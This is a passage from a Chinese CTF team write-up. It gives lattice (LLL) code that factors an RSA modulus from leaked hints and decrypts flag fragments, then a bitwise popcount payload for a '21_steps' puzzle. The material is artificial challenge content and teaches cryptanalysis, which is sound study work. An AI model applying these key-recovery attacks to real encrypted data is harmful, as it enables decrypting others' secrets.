22620929075309280405649238349357640303875210864208854217420509497788451366132889431240039164552611575528102978024292550959541449720371571757925105918051653777519219003404406299551822163574899163183356787743543, 20448555271367430173134759139565874060609709363893002188062221232670423900235907879442989619050874172750997684986786991784813276571714171675161047891339083833557999542955021257408958367084435326315450518847393, 16581432595661532600201978812720360650490725084571756108685801024225869509874266586101665454995626158761371202939602347462284734479523136008114543823450831433459621095011515966186441038409512845483898182330730, 23279853842002415904374433039119754653403309015190065311714877060259027498282160545851169991611095505190810819508498176947439317796919177899445232931519714386295909988604042659419915482267542524373950892662544, 16542280976863346138933938786694562410542429842169310231909671810291444369775133082891329676227328401108505520149711555594236523078258701726652736438397249153484528439336008442771240980575141952222517324476607, 17054798687400834881313828738161453727952686763495185341649729764826734928113560289710721893874591843482763545781022050238655346441049269145400183941816006501187555169759754496609909352066732267489240733143973, 22115728663051324710538517987151446287208882441569930705944807337542411196476967586630373946539021184108542887796299661200933395031919501574357288914028686562763621166172668808524981253976089963176915686295217, 19324745002425971121820837859939938858204545496254632010818159347041222757835937867307372949986924646040179923481350854019113237172710522847771842257888083088958980783122775860443475680302294211764812636993025, 17269103712436870749511150569030640471982622900104490728908671745662264368118790999669887094371008536628103283985205839448583011077421205589315164079023370873380480423797655480624151812894997816254147210406492, 17365467616785968410717969747207581822018195905573214322728668902230086291926193228235744513285718494565736538060677324971757810325341657627830082292794517994668597521842723473167615388674219621483061095351780, 20823988964903136690545608569993429386847299285019716840662662829134516039366335014168034963190410379384987535117127797097185441870894097973310130525700344822429616024795354496158261293140438037100429185280939, 19068742071797863698141529586788871165176403351706021832743114499444358327620104563127248492878047796963678668578417711317317649158855864613197342671267006688211460724339403654215571839421451060657330746917459, 20089639597210347757891251257684515181178224404350699015820324544431016085980542703447257134320668961280907495580251880177990935443438799776252979843969984270461013888122703933975001704404129130156833542263882, 22344734326131457204500487243249860924828673944521980798994250859372628295695660076289343998351448667548250129358262592043131205967592613289260998148991388190917863322690137458448696392344738292233285437662495, 22688858027824961235755458925538246922604928658660170686458395195714455094516952026243659139809095639584746977271909644938258445835519951859659822660413616465736923822988993362023001205350387354001389518742538, 21286046487289796335501643195437352334100195831127922478044197411293510360710188581314023052580692810484251118253550837525637065385439859631494533102244585493243972819369812352385425700028640641292410326514111, 21542729548465815605357067072323013570796657575603676418485975214641398139843537820643982914302122976789859817102498484496409546012119998359943274203338400776158986205776474024356567247508744784200354385060666, 22319592382753357951626314613193901130171847776829835028715915533809475362288873045184870972146269975570664009921662023590318988850871708674240304838922536028975978222603171333743353770676344328056539379240160, 25195209191944761648246874631038407055240893204894145709996399690807569652160721616011712739214434932639646688187304865397816188999592774874989401871300784534538762135830014255425391132306536883804201055992313, 18257804244956449160916107602212089869395886846990320452133193087611626919926796845263727422042179229606817439442521540784268169177331707314788427670112999551683927934427716554137597798283300120796277229509678, 20293403064916574136692432190836928681820834973375054705153628740577159076332283715581047503287766236543327123639746352358718218140738999496451259789097826888955418315455420948960832865750253988992454128969953, 15967654820584966012628708475666706277218484919923639492431538068059543232562431059752700377242326527417238151501168940191488179144049286512652111172149113549072003881460743035279388672984805823560897688895124, 25144187979876039024245879200325843092774389926620026124061775431569974232758799200333888039013494603721065709195353330350750055309315207499741437181094874894647736904055829877859906318073991986020178158776286, 15736932921640444103019961538951409924080453868073105830403926861058056351553271238438325117113945341892868641345117717666354739204401152657265824568724844930574396801692131746182948347887298330990039956813130, 18831072673439732764722762485733622234889447953507582396819704359771208236721692820362137219509611319088756045211407777880521726782697895768017460064889670066178710804124631128581556314122255564861269062385337, 23800437561684813552661749774840752013501533683948618798811470214669024646396165487093720960221009038817909066075238937189371227098032581450466402462014437421254375846263830927945343485988463525070074913720710, 24402191070622494792723290726249952159888270689258801831518209605331984684494095167423722682814769395395011136124403802097229547003802312444913008194461779426175966774202219703164060353710247619639616444797670, 20215481513831963554421686543560596857659844027486522940060791775984622049024173363533378455076109165728144576719015392033536498353094895564917644840994662704362121549525329105205514332808950206092190939931448, 18384453917605955747212560280232547481041600196031285084598132475801990710125754705645482436436531608696373462641765399622296314590071558616193035939108523357020287896879479452040171765916716377102454266933226, 21890401344164908103930010123434944359446535642544335610455613014563290097498740447164765588532234051104173227090428486681237432196639010849051113283297943367655458678533223039415083212229970648958070799280218, 18379893441293694747570620009241814202936873442370354246029979042247705730610190888710981918183390028386451290137755339890329474403224043675724851314770861939082447728194632548864823398818221526652331319263027, 18715827130228986951360013590464775001019026913384718876134449689773600060962392738619405370033085704046027397895627933844824630723286144367800484157574548819065406118338665931032779491897783504790669824301288, 13588739911708699123450670852772302012518315143187739886523841133752009403411431627334135210166268158490674049617489193734568451811305631563767138879895461211915128972052001136464325219117009268526575020143259, 18506039912943821193373920483847347155611306173368341979655092778147169768984477236224526786441466933360500418090210912574990962709452725122792963919616633389125605160796446674502416801964271004625701238202575, 22167985517547342184812919437069844889650448522260359154086923601900060998572245598167213217022051141570075284051615276464952346620430587694188548679895095556459804921016744713098882496174497693878187665372865, 21507363933875318987283059841465034113263466805329282129011688531718330888226928182985538861888698160675575993935166249701145994333840516459683763957425287811252135418288516497258724668090570720893589001392220, 20250321586608105267884665929443511322540360475552916143405651419034772061789298150974629817817611591100450468070842373341756704300393352252725859102426665187194754280129749402796746118608937061141768301995522, 16104259151024766025645778755951638093681273234415510444173981198301666343334808614748361662637508091511498829253677167171091582942780017355912433497214576425697459483727777273045993446283721290714044600814203, 14560242181138184594433372530956542527312169507277535425067427080573272033961044062335960097446781943943464713852520415535775461964590009720592053626735276833191667395201287169782350381649400286337671320581068, 16239347596615402699390026749150381714807445218767496868569282767673828662340774349530405347667558555781433774705139593469838946201218537641296949822639509296966092138954685186059819628696340121356660166937131, 21344472317634795288252811327141546596291633424850284492351783921599290478005814133560171828086405152298309169077585647189366292823613547973428250604674234857289341613448177246451956695700417432794886277704716, 16053809990112020217624905718566971288375815646771826941011489252522755953750669513046736360397030033178139614200701025268874379439106827823605937814395162011464610496629969260310816473733828751702925621950679, 18917855883623050190154989683327838135081813638430345099892537186954876489710857473326920009412778140451855952622686635694323466827034373114657023892484639238914593012175120540210780102536003758794571846502397, 22690171278715056779052233972642657173540399024770527983659216197108042021644328773010698851143953503599329885607621773816718008861742027388432534850163666629476315340137626681994316866368449548292328156728206, 21087818524872480052313215092436868441694786060866149491087132591272640372512484925209820065536439188250579925233059144898601140234767300574307770064543499923712729705795392684173268461519802573563186764326797, 18439753470094841291394543396785250736332596497190578058698960152415339036714664835925822942784700917586270640813663002161425694392259981974491535370706560550540525510875465091384383255081297963169390777475352, 20105719699015744146039374208926740159952318391171137544887868739518535254000803811729763681262304539724253518465850883904308979964535242371235415049403280585133993732946919550180260852767289669076362115454200, 17251599484976651171587511011045311555402088003441531674726612079301412643514474016351608797610153172169183504289799345382527665445027976807805594288914226822374523878290416047130731166794970645275146679838899, 23027331991437585896233907022469624030630702237261170259290872847355304456043379238362120518409085840638396736666056992747627271193089116095167049248270541979716594671069985183070290375121270398623215587207529, 18158149685496169798299129683009221264185608469410295069411669832919646968324946121757411511373498747604679198739125835462814352243797919744572086307939585501566092705355693015625009717017077302201663788208609, 18276153196656501517216055049560959047263892309902154534799806637704337317207294332426798932144785240877892837491213916540255237702169595754963908689566362060228840286531616263506272071630209104758589482803348, 19830654702835464289082520892939657653574451119898587213320188332842291005863699764597454403874285715252681820027919359194554863299385911740908952649966617784376852963552276558475217168696695867402522508290055, 15349828226638644963106414986240676364822261975534684137183044733508521003843559094515387144949811552173241406076270015291925943459603622043168219534080772937297911323165839870364550841685270125556125756627553, 20923687596111161976478930953796496927811701530608223491138786355445002217973253897724452954815797952200740069102515860924306246841340715110620719064010080520601890251137419840158983682372232110885549732743013, 21095748006022412831703352650023882351218414866517568822818298949510471554885207645049385966827210564667371665855668707424105040599599901165292360321667007968065708796593851653085339928947755081203265281357013, 20136320433636422315432754195821125224777716034031656342233368000257459497472596860252592531939146543685406198978058242599116859263546329669263543660114747385041549283367183026001454445297981439938401547228229, 16496919752274418275948572022974868132658743151124597724312835413857298109100258912203517423633396955060591787380445877361136405137884456764770035346437177846666365911942996404514058688909577420388537479730705, 13788728438272498164727737074811797093818033799836159894472736480763530670013682288670889124484670336660448907074673625466218166413315342420667608074179975422284472184048790475129281850298519112884101776426380, 24852871485448795332267345793743281093931161235481251209948049584749441451621572752080662697610253315331335180611651946374137068256112152253681972406000252076016099200912670370417045090034045383991812756120791, 18663346319122078996775762643035864683521213720864038756854558668694021987970601131985163948257100423991091156649638455828855082098689641225427227191064496066436196910238564311309556938903101074363279783438714, 21400068681031931459396470039651524575262457489792894764406364952394476440804779651233022862527636114968325782197380721095406628084183336358459476006267416033892771932528688312375109463803215034905281657962293, 16044158155847172030103761204572942507195578382208455423846603003318483484698088948486132040995746837257705704187725306831142305215342467016564452582165866039427184607605673304595194959499145031211096109534167, 16518253246325822837502418827700493807621067058438396395472266350036385535241769917459657069911028720968654253735107131282350340465691670072304718987805883113410923109703284511709226857412404454224134480632696, 22032469066601123287586507039704080058983969235246539501189720236880312024198451198788699002335010120658564926677243708367430773661097221076615953342733896063909953602379936312639192315223258556134958059637605, 17474611942177808070315948910226643697957069578572244709354155010512694059987765040746148981545760660371360975936526076852619987733316042847813177383519241505024635332293992920023420060610648140841369822739716, 20097265939024591617239874622716452182434300498447992668997438018575636772416262543204370899462096267444545094719202447520254303983442269757551626971917981420832391886214473318353984504467919530676605744560570, 18170251482705061226968041449812078923477452841162650888922564215790088545936753453513162197661916172215859504545409274440450807677845894292177296835154674774694992388033874349807244020099167681146357128785394, 18084007437523118129421476751918491055914528331902780911288404344016551650138679157754567938593688369062981279371320169939281882307797009116458871503759873023914718337944953764426183937635379280572434676575757, 17001811604221128900675671565539617923973183364469396458234914432162200119518252971721448274846235879320362924206656971472493711107677598961463553324277826426691784458674010708635756004550789902368338633272118, 20217009574515126619724139485885721324936960849401637840860565569588595992087537454744066905387396266844236387315004915383456736142307523960394594650088663019228826091309049211780607761862663242437656610298243, 25534440916970201550118006203706860249111087748000550226680885431006136131742280963090650607632467666558508520152535105122661615376298673454198064361094319699307084117001019115669670029195171047304283891069792, 18871869316294018605789169171879572816494092699556970507058691345095743053290043643010965660058888064972257990750611470141816041727746767146945121588515830427165739580791663951175220638901672353681640741068573, 20173968537913641339915058056878181363456579537994317562789857397928196160113042659777558550242315788417022891612723148843142958668959046890197219991727894451795438138592005695329607326086644956073759609743066, 20601943394990265144021144365970164017319737300436518536503270346147112565303361487668388700369636611354280332841812324530501569200031186584749278453651172121161814207025650519637781007286435981682228528706305, 16397528630087028144645213166977866073543422560337716097539091258081008408890966764995645782823950721804205427713461441138000880478364026137452291234097219085473748076681729365744710225699866258812642458184750, 21373350333568141000876969785296802670776508778278005158047105058430550665787088265486222905402690421155861103648370249249790560185790723042867282734693553039477436055775198037042047438047898227097749354619822, 17767469767416052322357795736899648760868316512079849340028040817353808899589201201338152114229279980849491049574543361275046276135253417685681262008211582060955974064559129311524323185960856955462761555353091, 22148352529815091269441663541923247974004854058764556809596705832663604786920964849725772666340437231503146814919702525852955831173047034475925578238466977606367380212886384487294569287202762127531620290162734, 21663842528026621741414050256553652815372885707031383713657826718944735177083300302064509342116651731671570591336596953911570477161536730982887182434407761036442993588590230296643001682944654490645815177777455, 20219077358929317461660881724990436334639078047412693497584358963241840513748365548465302817975329987854784305275832045889690022909383530837382543579292451297269623663257098458645056099201050578472103957851128, 18255302182526662903763852563401346841065939531070045000414364747445988455597258924280193695407035356029557886165605853810182770534711966292253269625917149411889979307227493949293798772727125069093642134972336, 24926064145128749429079117171467042019887257504329103038171762786986349157515552927216574990423327013202735544601170247730647598931030432792167867343343213411600516855009788294067588153504026267213013591793027, 22369607314724468760253123915374991621544992437057652340350735935680183705467064876346663859696919167243522648029531700630202188671406298533187087292461774927340821192866797400987231509211718089237481902671100, 16994227117141934754898145294760231694287000959561775153135582047697469327393472840046006353260694322888486978811557952926229613247229990658445756595259401269267528233642142950389040647504583683489067768144570, 21758885458682118428357134100118546351270408335845311063139309657532131159530485845186953650675925931634290182806173575543561250369768935902929861898597396621656214490429009706989779345367262758413050071213624, 20156282616031755826700336845313823798147854495428660743884481573484471099887576514309769978525225369254700468742981099548840277532978306665910844928986235042420698332201264764734685502001234369189521332392642, 23291765247744127414491614915358658114280269483384022733002965612273627987872443453777028006606037159079637857473229879140366385523633075816362547967658930666106914269093225208138749470566410361196451552322613, 19807792217079652175713365065361659318870738952921195173619551645956745050506271953949139230097128034416815169649874760890189515620232505703162831090225715453502422905418824316957257395992121750661389503495033, 22074209373194902539215367382758486068533032275912313703269990627206774967653336496619231924013216321042649461711292555464574124714934511202231319963361912937842068483700298097209400217869036338644607607557860, 19678336511265998427322297909733474384702243426420286924671444552444079816707773485084891630780465895504253899943221044355971296122774264925882685351095921532685536165514189427245840338009573352081361238596378, 24746314790210393213546150322117518542380438001687269872679602687597595933350510598742749840102841364627647151669428936678130556027300886850086220074563664367409218038338623691372433831784916816798993162471163, 19346137206512895254202370018555139713690272833895195472766704715282164091959131850520571672509601848193468792313437642997923790118115476212663296111963644011010744006086847599108492279986468255445160241848708, 22739514514055088545643169404630736699361136323546717268615404574809011342622362833245601099992039789664042350284789853188040159950619203242924511038681127008964592137006103547262538912024671048254652547084347, 21491512279698208400974501713300096639215882495977078132548631606796810881149011161903684894826752520167909538856354238104288201344211604223297924253960199754326239113862002469224042442018978623149685130901455, 19381008151938129775129563507607725859173925946797075261437001349051037306091047611533900186593946739906685481456985573476863123716331923469386565432105662324849798182175616351721533048174745501978394238803081, 19965143096260141101824772370858657624912960190922708879345774507598595008331705725441057080530773097285721556537121282837594544143441953208783728710383586054502176671726097169651121269564738513585870857829805]
n,e = (73566307488763122580179867626252642940955298748752818919017828624963832700766915409125057515624347299603944790342215380220728964393071261454143348878369192979087090394858108255421841966688982884778999786076287493231499536762158941790933738200959195185310223268630105090119593363464568858268074382723204344819, 65537)
enc2 = 30332590230153809507216298771130058954523332140754441956121305005101434036857592445870499808003492282406658682811671092885592290410570348283122359319554197485624784590315564056341976355615543224373344781813890901916269854242660708815123152440620383035798542275833361820196294814385622613621016771854846491244
V = hints[:4]
k = 2^800
M = Matrix.column([k * v for v in V]).augment(Matrix.identity(len(V)))
B = [b[1:] for b in M.LLL()]
M = (k * Matrix(B[:len(V)-2])).T.augment(Matrix.identity(len(V)))
B = [b[-len(V):] for b in M.LLL() if set(b[:len(V)-2]) == {0}]
for s, t in itertools.product(range(4), repeat=2):
T = s*B[0] + t*B[1]
a1, a2, a3, a4 = T
kq = gcd(a1 * hints[1] - a2 * hints[0], n)
if 1 < kq < n:
print('find!', kq, s, t)
break
for i in range(2**16, 1, -1):
if kq % i == 0:
kq //= i
q = int(kq)
p = int(n // kq)
d = pow(0x10001, -1, (p - 1) * (q - 1))
m = pow(enc2, d, n)
flag= long_to_bytes(m).decode()
print(flag)
#s0lve_the_@pb
第三部分参考这个题:https://blog.maple3142.net/2024/05/28/angstromctf-2024-writeups/
但是解出来不对,后面发现用的第二组的数据加密的rsa。。。。直接用上一个d解就好
enc3 = 17737974772490835017139672507261082238806983528533357501033270577311227414618940490226102450232473366793815933753927943027643033829459416623683596533955075569578787574561297243060958714055785089716571943663350360324047532058597960949979894090400134473940587235634842078030727691627400903239810993936770281755
d=63161710023005682001641222387261908738600679768601303308593545341859788186928800467532061832081889220655732875520328593226116199528042689465519293752965146159007213214854517385876812127128763146579744489192395430402667797637566878199509162723122664866142409202723436205520130646241903926144243067536101288033
n=73566307488763122580179867626252642940955298748752818919017828624963832700766915409125057515624347299603944790342215380220728964393071261454143348878369192979087090394858108255421841966688982884778999786076287493231499536762158941790933738200959195185310223268630105090119593363464568858268074382723204344819
print(long_to_bytes(pow(enc3, d, n)))
#q_prob1em!!}
21_steps
计算一个128bit数的汉明权重,找到了这篇文章:https://blog.csdn.net/nazeniwaresakini/article/details/107892004里面实现的是64bit的,根据相同的思想做一个扩展就能实现128bit的计算
最终payload
B=A>>1;B=B&113427455640312821154458202477256070485;A=A-B;B=A&68056473384187692692674921486353642291;A=A>>2;A=A&68056473384187692692674921486353642291;A=A+B;B=A>>4;A=A+B;A=A&20016609818878733144904388672456953615;B=A>>8;A=A+B;B=A>>16;A=A+B;B=A>>32;A=A+B;B=A>>64;A=A+B;A=A&127;
作者
CTF战队
ctf.wgpsec.org
扫描关注公众号回复加群
和师傅们一起讨论研究~
长
按
关
注
WgpSec狼组安全团队
微信号:wgpsec
Twitter:@wgpsec
